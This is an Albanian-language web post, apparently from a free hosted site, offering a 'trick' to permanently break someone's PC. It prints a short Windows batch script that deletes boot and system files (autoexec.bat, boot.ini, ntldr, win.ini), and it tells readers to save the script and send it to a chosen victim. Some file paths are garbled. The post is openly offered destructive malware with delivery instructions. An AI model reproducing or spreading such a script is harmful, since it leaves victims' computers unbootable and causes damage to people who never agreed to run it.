Privatkredit Vergleich
   
  kosova-gungame
  Fike PC-n Përgjithmon [RREZIK]
 
Cito:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
Hapeni notepad dhe bëjeni copy past codin që është i postuar më lart dhe ruajeni si fajll .bat dhe ja dergoni viktimes të cilen dëshironi më ja prish pc-n përgjithmon.

PERKUJTOJ
Mos klikoni ju mbi atë fajll se ju shkon Pc-ja

Gjithashtu nëse viktima ka VISTA atëhërë ky trik nuk funksionon.


------By spRox.

 
  Heute waren schon 8 ziyaretçi (90 klik) hier!  
 
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=